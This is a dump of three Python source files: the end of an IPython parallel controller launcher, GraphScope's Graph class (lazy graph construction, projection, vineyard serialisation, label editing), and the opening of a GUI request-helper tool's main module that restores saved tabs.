"""Full startup sequence (order matters): parse config/argv via the
superclass, then logging forwarding, JSON reuse, hub, schedulers."""
super(IPControllerApp, self).initialize(argv)
self.forward_logging()
self.load_secondary_config()
self.init_hub()
self.init_schedulers()
def start(self):
"""Run the controller: start children, install signal handlers, block on the loop."""
# Start the subprocesses:
self.factory.start()
# children must be started before signals are setup,
# otherwise signal-handling will fire multiple times
for child in self.children:
child.start()
self.init_signal()
self.write_pid_file(overwrite=True)
try:
self.factory.loop.start()
except KeyboardInterrupt:
self.log.critical("Interrupted, Exiting...\n")
finally:
# always remove (or deliberately keep) the JSON connection files
self.cleanup_connection_files()
def launch_new_instance(*args, **kwargs):
    """Create and run the IPython controller"""
    if sys.platform == 'win32':
        # Windows has no real fork, so a multiprocessing child that
        # re-imports this module would otherwise spawn Controllers
        # recursively (seen with vanilla-setuptools installs).
        # Only the main process may launch.
        import multiprocessing
        if multiprocessing.current_process().name != 'MainProcess':
            # we are a subprocess, don't start another Controller!
            return
    return IPControllerApp.launch_instance(*args, **kwargs)


if __name__ == '__main__':
    launch_new_instance()
|
graph.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import json
import logging
import threading
from copy import deepcopy
from typing import Mapping
import vineyard
from graphscope.client.session import get_default_session
from graphscope.config import GSConfig as gs_config
from graphscope.framework import dag_utils
from graphscope.framework import graph_utils
from graphscope.framework import utils
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph_schema import GraphSchema
from graphscope.framework.graph_utils import EdgeLabel
from graphscope.framework.graph_utils import EdgeSubLabel
from graphscope.framework.graph_utils import VertexLabel
from graphscope.framework.operation import Operation
from graphscope.proto import types_pb2
logger = logging.getLogger("graphscope")
class Graph(object):
"""A class for representing metadata of a graph in the GraphScope.
A :class:`Graph` object holds the metadata of a graph, such as key, schema, and the graph is directed or not.
It is worth noting that the graph is stored by the backend such as Analytical Engine, Vineyard.
In other words, the graph object holds nothing but metadata.
Graph construction is lazy: building operations are queued as a pending
operation and only evaluated when the graph's data is first needed
(see ``_pending_op`` in ``__init__``).
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> from graphscope.framework.loader import Loader
>>> sess = gs.session()
>>> graph = Graph(sess)
>>> graph = graph.add_vertices("person.csv","person")
>>> graph = graph.add_vertices("software.csv", "software")
>>> graph = graph.add_edges("knows.csv", "knows", src_label="person", dst_label="person")
>>> graph = graph.add_edges("created.csv", "created", src_label="person", dst_label="software")
>>> print(graph)
>>> print(graph.schema)
"""
def __init__(
self,
session=None,
incoming_data=None,
oid_type="int64",
directed=True,
generate_eid=True,
):
"""Construct a :class:`Graph` object.
Args:
session (optional): The session the graph is created in; defaults to
the current default session.
incoming_data: Graph can be initialized through various type of sources,
which can be one of:
- :class:`Operation`
- :class:`nx.Graph`
- :class:`Graph`
- :class:`vineyard.Object`, :class:`vineyard.ObjectId` or :class:`vineyard.ObjectName`
oid_type (str, optional): Type of the original vertex ids; normalized
to "int64_t" or "std::string". Defaults to "int64".
directed (bool, optional): Whether the graph is directed. Defaults to True.
generate_eid (bool, optional): Whether to generate edge ids. Defaults to True.
"""
self._key = None
self._graph_type = types_pb2.ARROW_PROPERTY
self._vineyard_id = 0
self._schema = GraphSchema()
if session is None:
session = get_default_session()
self._session = session
self._detached = False
self._interactive_instance_launching_thread = None
self._interactive_instance_list = []
self._learning_instance_list = []
# Hold uncompleted operation for lazy evaluation
self._pending_op = None
# Hold a reference to base graph of modify operation,
# to avoid being garbage collected
self._base_graph = None
oid_type = utils.normalize_data_type_str(oid_type)
if oid_type not in ("int64_t", "std::string"):
raise ValueError("oid_type can only be int64_t or string.")
self._oid_type = oid_type
self._directed = directed
self._generate_eid = generate_eid
self._unsealed_vertices = {}
self._unsealed_edges = {}
# Used to display schema without load into vineyard,
# and do sanity checking for newly added vertices and edges.
self._v_labels = []
self._e_labels = []
self._e_relationships = []
if incoming_data is not None:
# Don't import the :code:`NXGraph` in top-level statements to improve the
# performance of :code:`import graphscope`.
from graphscope.experimental import nx
if isinstance(incoming_data, Operation):
self._pending_op = incoming_data
if self._pending_op.type == types_pb2.PROJECT_GRAPH:
self._graph_type = types_pb2.ARROW_PROJECTED
elif isinstance(incoming_data, nx.Graph):
self._pending_op = self._from_nx_graph(incoming_data)
elif isinstance(incoming_data, Graph):
self._pending_op = self._copy_from(incoming_data)
elif isinstance(
incoming_data, (vineyard.Object, vineyard.ObjectID, vineyard.ObjectName)
):
self._pending_op = self._from_vineyard(incoming_data)
else:
raise RuntimeError("Not supported incoming data.")
def __del__(self):
    """Best-effort unload on garbage collection.

    Swallows every exception deliberately: the session may already be
    closed or destroyed at interpreter shutdown, and destructors must
    not raise.
    """
    try:
        self.unload()
    except Exception:  # pylint: disable=broad-except
        pass
def _close_interactive_instances(self):
    """Close every attached interactive instance.

    Called when the graph is unloaded: with the graph gone, gremlin
    queries through those instances would be meaningless.
    """
    instances = self._interactive_instance_list
    for inst in instances:
        inst.close()
    del instances[:]
def _close_learning_instances(self):
    """Close every attached learning instance and forget them."""
    instances = self._learning_instance_list
    for inst in instances:
        inst.close()
    del instances[:]
def _launch_interactive_instance_impl(self):
"""Launch a gremlin instance for this graph (runs in a background thread)."""
try:
self._session.gremlin(self)
except: # noqa: E722
# Launch failures are recorded in the `InteractiveQuery` object
# itself; suppress all exceptions here so the background thread
# never crashes the process.
pass
def _from_graph_def(self, graph_def):
"""Populate this object's metadata from an evaluated graph_def message."""
check_argument(
self._graph_type == graph_def.graph_type, "Graph type doesn't match."
)
self._key = graph_def.key
self._vineyard_id = graph_def.vineyard_id
self._oid_type = graph_def.schema_def.oid_type
self._directed = graph_def.directed
self._generate_eid = graph_def.generate_eid
self._schema_path = graph_def.schema_path
self._schema.get_schema_from_def(graph_def.schema_def)
# mirror label/relationship views from the parsed schema
self._v_labels = self._schema.vertex_labels
self._e_labels = self._schema.edge_labels
self._e_relationships = self._schema.edge_relationships
def _ensure_loaded(self):
"""Force evaluation of the pending op so metadata (key, schema) is valid.

No-op if already loaded. Raises RuntimeError for an unloaded or empty
graph.
"""
if self._key is not None and self._pending_op is None:
return
# Unloaded
if self._session is None:
raise RuntimeError("The graph is not loaded")
# Empty graph
if self._key is None and self._pending_op is None:
raise RuntimeError("Empty graph.")
# Try to load
if self._pending_op is not None:
# Create a graph from scratch.
graph_def = self._pending_op.eval()
self._from_graph_def(graph_def)
# evaluation done; drop the references held for lazy evaluation
self._pending_op = None
self._base_graph = None
self._unsealed_vertices.clear()
self._unsealed_edges.clear()
# init saved_signature (must be after init schema)
self._saved_signature = self.signature
# create gremlin server pod asynchronously
if gs_config.initializing_interactive_engine:
self._interactive_instance_launching_thread = threading.Thread(
target=self._launch_interactive_instance_impl, args=()
)
self._interactive_instance_launching_thread.start()
@property
def key(self):
"""The key of the corresponding graph in engine."""
self._ensure_loaded()
return self._key
@property
def graph_type(self):
"""The type of the graph object.
Returns:
type (`types_pb2.GraphType`): the type of the graph.
"""
return self._graph_type
@property
def schema(self):
"""Schema of the graph.
Returns:
:class:`GraphSchema`: the schema of the graph
"""
self._ensure_loaded()
return self._schema
@property
def schema_path(self):
"""Path that Coordinator will write interactive schema path to.
Returns:
str: The path contains the schema. for interactive engine.
"""
self._ensure_loaded()
return self._schema_path
@property
def signature(self):
"""SHA-256 hex digest over the schema signature and graph key.

Note: accessing this (like the other loaded properties) forces
evaluation of any pending operation.
"""
self._ensure_loaded()
return hashlib.sha256(
"{}.{}".format(self._schema.signature(), self._key).encode("utf-8")
).hexdigest()
@property
def template_str(self):
"""C++ fragment template instantiation string for codegen.

Raises:
ValueError: for graph types other than ARROW_PROPERTY,
ARROW_PROJECTED or DYNAMIC_PROJECTED.
"""
self._ensure_loaded()
# transform str/string to std::string
oid_type = utils.normalize_data_type_str(self._oid_type)
vid_type = self._schema.vid_type
vdata_type = utils.data_type_to_cpp(self._schema.vdata_type)
edata_type = utils.data_type_to_cpp(self._schema.edata_type)
if self._graph_type == types_pb2.ARROW_PROPERTY:
template = f"vineyard::ArrowFragment<{oid_type},{vid_type}>"
elif self._graph_type == types_pb2.ARROW_PROJECTED:
template = f"gs::ArrowProjectedFragment<{oid_type},{vid_type},{vdata_type},{edata_type}>"
elif self._graph_type == types_pb2.DYNAMIC_PROJECTED:
template = f"gs::DynamicProjectedFragment<{vdata_type},{edata_type}>"
else:
raise ValueError(f"Unsupported graph type: {self._graph_type}")
return template
@property
def vineyard_id(self):
"""Get the vineyard object_id of this graph.
Returns:
str: return vineyard id of this graph
"""
self._ensure_loaded()
return self._vineyard_id
@property
def session_id(self):
"""Get the current session_id.
Returns:
str: Return session id that the graph belongs to.
"""
return self._session.session_id
def detach(self):
"""Detaching a graph makes it being left in vineyard even when the variable for
this :class:`Graph` object leaves the lexical scope.
The graph can be accessed using the graph's :code:`ObjectID` or its name later.
"""
self._detached = True
def loaded(self):
"""Return True if the graph is (or can be) materialized, False otherwise."""
try:
self._ensure_loaded()
except RuntimeError:
return False
return self._key is not None
def __str__(self):
    """Human-readable summary: graph type, vertex labels, edge relations."""
    v_str = "\n".join(f"VERTEX: {label}" for label in self._v_labels)
    relations = []
    # Pair each edge label with its relationship list directly instead of
    # indexing by position (`for i in range(len(...))` anti-idiom).
    for label, rels in zip(self._e_labels, self._e_relationships):
        relations.extend((label, src, dst) for src, dst in rels)
    e_str = "\n".join(
        f"EDGE: {label}\tsrc: {src}\tdst: {dst}" for label, src, dst in relations
    )
    return f"graphscope.Graph\n{types_pb2.GraphType.Name(self._graph_type)}\n{v_str}\n{e_str}"
def __repr__(self):
    return self.__str__()
def unload(self):
"""Unload this graph from graphscope engine.

Closes attached interactive/learning instances first, then (unless
detached) issues an unload op. Safe to call on an already-empty
graph; raises RuntimeError if already unloaded.
"""
if self._session is None:
raise RuntimeError("The graph is not loaded")
if self._key is None:
# never materialized: just drop local state
self._session = None
self._pending_op = None
return
# close interactive instances first
try:
if (
self._interactive_instance_launching_thread is not None
and self._interactive_instance_launching_thread.is_alive()
):
# join raises a RuntimeError if an attempt is made to join the current thread.
# this exception occurs when a object collected by gc mechanism contains a running thread.
if (
threading.current_thread()
!= self._interactive_instance_launching_thread
):
self._interactive_instance_launching_thread.join()
self._close_interactive_instances()
except Exception as e:
logger.error("Failed to close interactive instances: %s" % e)
try:
self._close_learning_instances()
except Exception as e:
logger.error("Failed to close learning instances: %s" % e)
if not self._detached:
# detached graphs stay alive in vineyard; others are unloaded now
op = dag_utils.unload_graph(self)
op.eval()
self._key = None
self._session = None
self._pending_op = None
def project_to_simple(self, v_label="_", e_label="_", v_prop=None, e_prop=None):
    """Project a property graph to a simple graph, useful for analytical engine.

    Will translate name represented label or property to index, which is
    broadly used in internal engine.

    Args:
        v_label (str or int, optional): vertex label to project. Defaults to "_".
        e_label (str or int, optional): edge label to project. Defaults to "_".
        v_prop (str or int, optional): vertex property of the v_label. Defaults to None.
        e_prop (str or int, optional): edge property of the e_label. Defaults to None.

    Returns:
        :class:`Graph`: A `Graph` instance, which graph_type is `ARROW_PROJECTED`

    Raises:
        ValueError: if a label/property does not exist, or the relation
            v_label -> e_label <- v_label is absent from the schema.
        IndexError: if a numeric label/property id is out of range.
    """
    self._ensure_loaded()
    check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
    self._check_unmodified()

    def check_out_of_range(id, length):
        if id >= length or id < 0:
            raise IndexError("id {} is out of range.".format(id))

    try:
        if isinstance(v_label, str):
            v_label_id = self._schema.vertex_label_index(v_label)
        else:
            v_label_id = v_label
            check_out_of_range(v_label_id, self._schema.vertex_label_num)
            v_label = self._schema.vertex_labels[v_label_id]
        if isinstance(e_label, str):
            e_label_id = self._schema.edge_label_index(e_label)
        else:
            e_label_id = e_label
            check_out_of_range(e_label_id, self._schema.edge_label_num)
            # BUG FIX: index with the resolved id (the original indexed
            # with the raw `e_label` argument), mirroring the v_label
            # branch above.
            e_label = self._schema.edge_labels[e_label_id]
    except ValueError as e:
        raise ValueError("Label does not exists.") from e
    # Check relation v_label -> e_label <- v_label exists.
    relation = (v_label, v_label)
    if relation not in self._schema.edge_relationships[e_label_id]:
        raise ValueError(
            f"Graph doesn't contain such relationship: {v_label} -> {e_label} <- {v_label}."
        )
    try:
        if v_prop is None:
            # -1 means "no property selected"
            v_prop_id = -1
            vdata_type = None
        else:
            if isinstance(v_prop, str):
                v_prop_id = self._schema.vertex_property_index(v_label_id, v_prop)
            else:
                v_prop_id = v_prop
            properties = self._schema.vertex_properties[v_label_id]
            check_out_of_range(v_prop_id, len(properties))
            vdata_type = list(properties.values())[v_prop_id]
        if e_prop is None:
            e_prop_id = -1
            edata_type = None
        else:
            if isinstance(e_prop, str):
                e_prop_id = self._schema.edge_property_index(e_label_id, e_prop)
            else:
                e_prop_id = e_prop
            properties = self._schema.edge_properties[e_label_id]
            check_out_of_range(e_prop_id, len(properties))
            edata_type = list(properties.values())[e_prop_id]
    except ValueError as e:
        raise ValueError("Property does not exists.") from e
    oid_type = self._schema.oid_type
    vid_type = self._schema.vid_type
    op = dag_utils.project_arrow_property_graph(
        self,
        v_label_id,
        v_prop_id,
        e_label_id,
        e_prop_id,
        vdata_type,
        edata_type,
        oid_type,
        vid_type,
    )
    return Graph(self._session, op)
def add_column(self, results, selector):
    """Add the results as a column to the graph. Modification rules are
    given by the selector.

    Args:
        results (:class:`Context`): A `Context` that created by doing a query.
        selector (dict): Select results to add as column. Format is similar
            to selectors in `Context`.

    Returns:
        :class:`Graph`: A new `Graph` with new columns.
    """
    self._ensure_loaded()
    check_argument(
        isinstance(selector, Mapping), "selector of add column must be a dict"
    )
    check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
    self._check_unmodified()
    transformed = {
        key: results._transform_selector(value) for key, value in selector.items()
    }
    op = dag_utils.add_column(self, results, json.dumps(transformed))
    return Graph(self._session, op)
def to_numpy(self, selector, vertex_range=None):
    """Select some elements of the graph and output to numpy.

    Args:
        selector (str): Select a portion of graph as a numpy.ndarray.
        vertex_range (dict, optional): Slice vertices. Defaults to None.

    Returns:
        `numpy.ndarray`
    """
    check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
    self._ensure_loaded()
    self._check_unmodified()
    transformed = utils.transform_labeled_vertex_property_data_selector(
        self, selector
    )
    sliced_range = utils.transform_vertex_range(vertex_range)
    op = dag_utils.graph_to_numpy(self, transformed, sliced_range)
    return utils.decode_numpy(op.eval())
def to_dataframe(self, selector, vertex_range=None):
    """Select some elements of the graph and output as a pandas.DataFrame.

    Args:
        selector (dict): Select some portions of graph.
        vertex_range (dict, optional): Slice vertices. Defaults to None.

    Returns:
        `pandas.DataFrame`
    """
    check_argument(self.graph_type == types_pb2.ARROW_PROPERTY)
    self._ensure_loaded()
    self._check_unmodified()
    check_argument(
        isinstance(selector, Mapping),
        "selector of to_vineyard_dataframe must be a dict",
    )
    transformed = {
        key: utils.transform_labeled_vertex_property_data_selector(self, value)
        for key, value in selector.items()
    }
    sliced_range = utils.transform_vertex_range(vertex_range)
    op = dag_utils.graph_to_dataframe(self, json.dumps(transformed), sliced_range)
    return utils.decode_dataframe(op.eval())
def is_directed(self):
    """Return True when the graph was constructed as a directed graph."""
    self._ensure_loaded()
    return self._directed
def _check_unmodified(self):
"""Raise (via check_argument) if the graph's signature changed since loading."""
self._ensure_loaded()
check_argument(
self.signature == self._saved_signature, "Graph has been modified!"
)
def _from_nx_graph(self, incoming_graph):
    """Create a gs graph op from a nx graph.

    Args:
        incoming_graph (:class:`nx.graph`): A nx graph that contains graph data.

    Returns:
        An op that will be used to construct a gs.Graph.

    Raises:
        TypeError: if *incoming_graph* is a graph view.

    Examples:
        >>> nx_g = nx.path_graph(10)
        >>> gs_g = gs.Graph(nx_g)
    """
    # Graph views wrap another graph (exposed via `_graph`) and cannot
    # be converted directly.
    if hasattr(incoming_graph, "_graph"):
        raise TypeError("graph view can not convert to gs graph")
    return dag_utils.dynamic_to_arrow(incoming_graph)
def _copy_from(self, incoming_graph):
    """Create an op that copies *incoming_graph*.

    Args:
        incoming_graph (:class:`Graph`): Source graph to be copied from.

    Returns:
        An op producing an identical graph with a new vineyard id.
    """
    check_argument(incoming_graph.graph_type == types_pb2.ARROW_PROPERTY)
    check_argument(incoming_graph.loaded())
    return dag_utils.copy_graph(incoming_graph)
def _from_vineyard(self, vineyard_object):
"""Load a graph from a already existed vineyard graph.
Args:
vineyard_object (:class:`vineyard.Object`, :class:`vineyard.ObjectID`
or :class:`vineyard.ObjectName`): vineyard object,
which represents a graph.
Returns:
A graph_def, or None for an unrecognized type (callers in
``__init__`` already isinstance-check, so that case is unreachable
from there).
"""
if isinstance(vineyard_object, vineyard.Object):
# unwrap the object to its id
return self._from_vineyard_id(vineyard_object.id)
if isinstance(vineyard_object, vineyard.ObjectID):
return self._from_vineyard_id(vineyard_object)
if isinstance(vineyard_object, vineyard.ObjectName):
return self._from_vineyard_name(vineyard_object)
def _from_vineyard_id(self, vineyard_id):
    """Build a create-graph op referencing an existing vineyard object id."""
    # FIXME(hetao) hardcode oid/vid type for codegen, when loading from
    # vineyard; the metadata should be retrieved from vineyard instead.
    config = {
        types_pb2.IS_FROM_VINEYARD_ID: utils.b_to_attr(True),
        types_pb2.VINEYARD_ID: utils.i_to_attr(int(vineyard_id)),
        types_pb2.OID_TYPE: utils.s_to_attr("int64_t"),
        types_pb2.VID_TYPE: utils.s_to_attr("uint64_t"),
    }
    return dag_utils.create_graph(
        self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
    )
def _from_vineyard_name(self, vineyard_name):
    """Build a create-graph op referencing an existing vineyard object name."""
    # FIXME(hetao) hardcode oid/vid type for codegen, when loading from
    # vineyard; the metadata should be retrieved from vineyard instead.
    config = {
        types_pb2.IS_FROM_VINEYARD_ID: utils.b_to_attr(True),
        types_pb2.VINEYARD_NAME: utils.s_to_attr(str(vineyard_name)),
        types_pb2.OID_TYPE: utils.s_to_attr("int64_t"),
        types_pb2.VID_TYPE: utils.s_to_attr("uint64_t"),
    }
    return dag_utils.create_graph(
        self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
    )
def _attach_interactive_instance(self, instance):
    """Remember *instance* so it is closed when this graph is unloaded.

    Args:
        instance: interactive instance
    """
    self._interactive_instance_list.append(instance)
def _attach_learning_instance(self, instance):
    """Remember *instance* so it is closed when this graph is unloaded.

    Args:
        instance: learning instance
    """
    self._learning_instance_list.append(instance)
def save_to(self, path, **kwargs):
"""Serialize graph to a location.
The meta and data of graph is dumped to specified location,
and can be restored by `Graph.deserialize` in other sessions.
Each worker will write a `path_{worker_id}.meta` file and
a `path_{worker_id}` file to storage.
Args:
path (str): supported storages are local, hdfs, oss, s3
**kwargs: forwarded to vineyard.io.serialize as storage_options.
"""
# deferred imports: vineyard.io is only needed for (de)serialization
import vineyard
import vineyard.io
self._ensure_loaded()
sess = self._session
# ssh deployment is used for non-k8s ("hosts") sessions
deployment = "kubernetes" if sess.info["type"] == "k8s" else "ssh"
conf = sess.info["engine_config"]
vineyard_endpoint = conf["vineyard_rpc_endpoint"]
vineyard_ipc_socket = conf["vineyard_socket"]
if sess.info["type"] == "k8s":
# qualify each engine host with the namespace
hosts = [
"{}:{}".format(sess.info["namespace"], s)
for s in sess.info["engine_hosts"].split(",")
]
else: # type == "hosts"
hosts = sess.info["engine_hosts"].split(",")
vineyard.io.serialize(
path,
vineyard.ObjectID(self._vineyard_id),
type="global",
vineyard_ipc_socket=vineyard_ipc_socket,
vineyard_endpoint=vineyard_endpoint,
storage_options=kwargs,
deployment=deployment,
hosts=hosts,
)
@classmethod
def load_from(cls, path, sess, **kwargs):
"""Construct a `Graph` by deserialize from `path`.
It will read all serialization files, which is dumped by
`Graph.serialize`.
If any serialize file doesn't exists or broken, will error out.
Args:
path (str): Path contains the serialization files.
sess (`graphscope.Session`): The target session
that the graph will be construct in
**kwargs: forwarded to vineyard.io.deserialize as storage_options.
Returns:
`Graph`: A new graph object. Schema and data is supposed to be
identical with the one that called serialized method.
"""
# deferred imports: vineyard.io is only needed for (de)serialization
import vineyard
import vineyard.io
deployment = "kubernetes" if sess.info["type"] == "k8s" else "ssh"
conf = sess.info["engine_config"]
vineyard_endpoint = conf["vineyard_rpc_endpoint"]
vineyard_ipc_socket = conf["vineyard_socket"]
if sess.info["type"] == "k8s":
# qualify each engine host with the namespace
hosts = [
"{}:{}".format(sess.info["namespace"], s)
for s in sess.info["engine_hosts"].split(",")
]
else: # type == "hosts"
hosts = sess.info["engine_hosts"].split(",")
graph_id = vineyard.io.deserialize(
path,
type="global",
vineyard_ipc_socket=vineyard_ipc_socket,
vineyard_endpoint=vineyard_endpoint,
storage_options=kwargs,
deployment=deployment,
hosts=hosts,
)
# wrap the restored vineyard object in a new Graph bound to `sess`
return cls(sess, vineyard.ObjectID(graph_id))
def draw(self, vertices, hop=1):
"""Visualize the graph data in the result cell when the draw functions are invoked
Args:
vertices (list): selected vertices.
hop (int): draw induced subgraph with hop extension. Defaults to 1.
Returns:
A GraphModel.
"""
# third-party notebook widget; imported lazily so it is only required
# when draw() is actually used
from ipygraphin import GraphModel
self._ensure_loaded()
interactive_query = self._session.gremlin(self)
graph = GraphModel()
graph.queryGraphData(vertices, hop, interactive_query)
# listen on the 1~2 hops operation of node
graph.on_msg(graph.queryNeighbor)
return graph
def _construct_graph(
self, vertices, edges, v_labels, e_labels, e_relations, mutation_func=None
):
"""Construct graph.
1. Construct a graph from scratch.
If the vertices and edges is empty, return a empty graph.
2. Construct a graph from existed builded graph.
If the vertices and edges is empty, return a copied graph.
Args:
vertices (dict): label -> unsealed VertexLabel definitions.
edges (dict): label -> unsealed edge definitions.
v_labels (list): vertex label names for the new graph.
e_labels (list): edge label names for the new graph.
e_relations (list): per-edge-label (src, dst) relationship lists.
mutation_func (callable, optional): dag_utils op builder mutating an
existing graph (e.g. add_vertices); None builds from scratch.
Returns:
:class:`Graph`: the newly constructed (still lazy) graph.
"""
config = graph_utils.assemble_op_config(
vertices.values(),
edges.values(),
self._oid_type,
self._directed,
self._generate_eid,
)
# edge case.
if not vertices and not edges:
if mutation_func:
# Rely on `self._key`
return Graph(self._session, self)
else:
return Graph(
self._session,
None,
self._oid_type,
self._directed,
self._generate_eid,
)
if mutation_func:
op = mutation_func(self, attrs=config)
else:
op = dag_utils.create_graph(
self.session_id, types_pb2.ARROW_PROPERTY, attrs=config
)
graph = Graph(
self._session, op, self._oid_type, self._directed, self._generate_eid
)
# carry the unsealed definitions forward for further add_* calls
graph._unsealed_vertices = vertices
graph._unsealed_edges = edges
graph._v_labels = v_labels
graph._e_labels = e_labels
graph._e_relationships = e_relations
# propage info about whether is a loaded graph.
# graph._key = self._key
if mutation_func:
# keep the base graph alive until the mutation op is evaluated
graph._base_graph = self._base_graph or self
return graph
def add_vertices(self, vertices, label="_", properties=[], vid_field=0):
is_from_existed_graph = len(self._unsealed_vertices) != len(
self._v_labels
) or len(self._unsealed_edges) != len(self._e_labels)
if label in self._v_labels:
raise ValueError(f"Label {label} already existed in graph.")
if not self._v_labels and self._e_labels:
raise ValueError("Cannot manually add vertices after inferred vertices.")
unsealed_vertices = deepcopy(self._unsealed_vertices)
unsealed_vertices[label] = VertexLabel(
label=label, loader=vertices, properties=properties, vid_field=vid_field
)
v_labels = deepcopy(self._v_labels)
v_labels.append(label)
# Load after validity check and before create add_vertices op.
# TODO(zsy): Add ability to add vertices and edges to existed graph simultaneously.
if is_from_existed_graph and self._unsealed_edges:
self._ensure_loaded()
func = dag_utils.add_vertices if is_from_existed_graph else None
return self._construct_graph(
unsealed_vertices,
self._unsealed_edges,
v_labels,
self._e_labels,
self._e_relationships,
func,
)
def add_edges(
self,
edges,
label="_",
properties=[],
src_label=None,
dst_label=None,
src_field=0,
dst_field=1,
):
"""Add edges to graph.
1. Add edges to a uninitialized graph.
i. src_label and dst_label both unspecified. In this case, current graph must
has 0 (we deduce vertex label from edge table, and set vertex label name to '_'),
or 1 vertex label (we set src_label and dst label to this).
ii. src_label and dst_label both specified and existed in current graph's vertex labels.
iii. src_label and dst_label both specified and there is no vertex labels in current graph.
we deduce all vertex labels from edge tables.
Note that you either provide all vertex labels, or let graphscope deduce all vertex labels.
We don't support mixed style.
2. Add edges to a existed graph.
Must add a new kind of edge label, not a new relation to builded graph.
But you can add a new relation to uninitialized part of the graph.
src_label and dst_label must be specified and existed in current graph.
Args:
edges ([type]): [description]
label (str, optional): [description]. Defaults to "_".
properties ([type], optional): [description]. Defaults to None.
src_label ([type], optional): [description]. Defaults to None.
dst_label ([type], optional): [description]. Defaults to None.
src_field (int, optional): [description]. Defaults to 0.
dst_field (int, optional): [description]. Defaults to 1.
Raises:
RuntimeError: [description]
Returns:
Graph: [description]
"""
is_from_existed_graph = len(self._unsealed_vertices) != len(
self._v_labels
) or len(self._unsealed_edges) != len(self._e_labels)
if is_from_existed_graph:
if label in self._e_labels and label not in self._unsealed_edges:
raise ValueError("Cannot add new relation to existed graph.")
if src_label is None or dst_label is None:
raise ValueError("src label and dst label cannot be None.")
if src_label not in self._v_labels or dst_label not in self._v_labels:
raise ValueError("src label or dst_label not existed in graph.")
else:
if src_label is None and dst_label is None:
check_argument(len(self._v_labels) <= 1, "ambiguous vertex label")
if len(self._v_labels) == 1:
src_label = dst_label = self._v_labels[0]
else:
src_label = dst_label = "_"
elif src_label is not None and dst_label is not None:
if self._v_labels:
if (
src_label not in self._v_labels
or dst_label not in self._v_labels
):
raise ValueError("src label or dst_label not existed in graph.")
else:
# Infer all v_labels from edge tables.
pass
else:
raise ValueError(
"src and dst label must be both specified or either unspecified."
)
check_argument(
src_field != dst_field, "src and dst field cannot refer to the same field"
)
unsealed_edges = deepcopy(self._unsealed_edges)
e_labels = deepcopy(self._e_labels)
relations = deepcopy(self._e_relationships)
if label in unsealed_edges:
assert label in self._e_labels
label_idx = self._e_labels.index(label)
# Will check conflict in `add_sub_label`
relations[label_idx].append((src_label, dst_label))
cur_label = unsealed_edges[label]
else:
e_labels.append(label)
relations.append([(src_label, dst_label)])
cur_label = EdgeLabel(label)
cur_label.add_sub_label(
EdgeSubLabel(edges, properties, src_label, dst_label, src_field, dst_field)
)
unsealed_edges[label] = cur_label
# Load after validity check and before create add_vertices op.
# TODO(zsy): Add ability to add vertices and edges to existed graph simultaneously.
if is_from_existed_graph and self._unsealed_vertices:
self._ensure_loaded()
func = dag_utils.add_edges if is_from_existed_graph else None
return self._construct_graph(
self._unsealed_vertices,
unsealed_edges,
self._v_labels,
e_labels,
relations,
func,
)
def remove_vertices(self, label):
if label not in self._v_labels:
raise ValueError(f"label {label} not in vertices.")
if label not in self._unsealed_vertices:
raise ValueError(
"Remove vertices from a loaded graph doesn't supported yet"
)
# Check whether safe to remove
for rel in self._e_relationships:
for sub_rel in rel:
if label in sub_rel:
raise ValueError(
f"Vertex {label} has usage in relation {sub_rel}, please remove that edge first."
)
unsealed_vertices = deepcopy(self._unsealed_vertices)
v_labels = deepcopy(self._v_labels)
unsealed_vertices.pop(label)
v_labels.remove(label)
return self._construct_graph(
unsealed_vertices,
self._unsealed_edges,
v_labels,
self._e_labels,
self._e_relationships,
)
def remove_edges(self, label, src_label=None, dst_label=None):
if label not in self._e_labels:
raise ValueError(f"label {label} not in edges")
if label not in self._unsealed_edges:
raise ValueError("Remove edges from a loaded graph doesn't supported yet")
unsealed_edges = deepcopy(self._unsealed_edges)
e_labels = deepcopy(self._e_labels)
relations = deepcopy(self._e_relationships)
# Calculate the items to remove
remove_list = []
label_idx = e_labels.index(label)
for rel in relations[label_idx]:
for sub_rel in rel:
if src_label is None or src_label == sub_rel[0]:
if dst_label is None or dst_label == sub_rel[1]:
remove_list.append(sub_rel)
if not remove_list:
raise ValueError("Cannot find edges to remove.")
# Remove the edge label
if src_label is None and dst_label is None:
unsealed_edges.pop(label)
e_labels.pop(label_idx)
relations.pop(label_idx)
else:
cur_label = unsealed_edges[label]
for sub_rel in remove_list:
cur_label.sub_labels.pop(sub_rel)
relations[label_idx].remove(sub_rel)
# Remove entire label if no relations still exists.
if not relations[label_idx]:
unsealed_edges.pop(label)
e_labels.pop(label_idx)
relations.pop(label_idx)
return self._construct_graph(
self._unsealed_vertices, unsealed_edges, self._v_labels, e_labels, relations
)
def g(incoming_data):
    """Shorthand constructor: build a Graph from ``incoming_data``."""
    return Graph(incoming_data=incoming_data)
|
main.py | import os
import sys
from . import __version__
from .root import (
root,
config,
change_siz,
tails,
)
from .menu import bind_menu
from .tab import (
nb,
bind_frame,
delete_curr_tab,
cancel_delete,
create_new_reqtab,
create_new_rsptab,
create_helper,
change_tab_name,
send_request,
save_config,
switch_response_log,
create_test_code,
create_scrapy_code,
get_html_pure_text,
get_xpath_elements,
get_auto_xpath,
get_auto_json,
choice_auto_json,
execute_code,
execute_scrapy_code,
create_js_parse,
create_selenium_parse,
create_temp_idle,
create_encoder,
create_test_code_urllib,
)
from .combinekey import (
bind_ctl_key,
bind_alt_key,
)
# These frame modules provide the GUI windows the tool is currently built around.
from .frame import (
helper_window,
request_window,
)
# === Initialization ===
# Restore the tabs saved in the config snapshot; with no saved settings,
# show the help tab instead.
settings = config['set']
if not settings:
    create_helper()
else:
    for key,setting in settings.items():
        if setting.get('type') == 'request':
            tab_id = bind_frame(request_window(setting),key)
